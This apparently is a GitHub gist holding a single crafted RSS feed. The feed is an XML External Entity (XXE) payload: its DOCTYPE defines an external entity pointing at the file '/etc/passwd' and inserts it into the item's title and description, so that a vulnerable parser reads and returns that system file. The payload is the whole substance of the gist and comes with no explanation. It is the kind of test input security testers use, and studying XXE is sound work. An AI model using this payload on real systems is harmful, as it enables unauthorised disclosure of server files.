Last active
June 24, 2016 11:31
-
-
Save omarkurt/bcc5c737cb9bc337e208 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<!DOCTYPE description [ <!ELEMENT description ANY > | |
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]> | |
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
<channel> | |
<title>Test</title> | |
<link>za</link> | |
<description>A blog about things</description> | |
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
<item> | |
<title>&xxe;</title> | |
<link>http://example.com</link> | |
<description>&xxe;</description> | |
<author>[email protected]</author> | |
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate> | |
</item> | |
</channel> | |
</rss> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment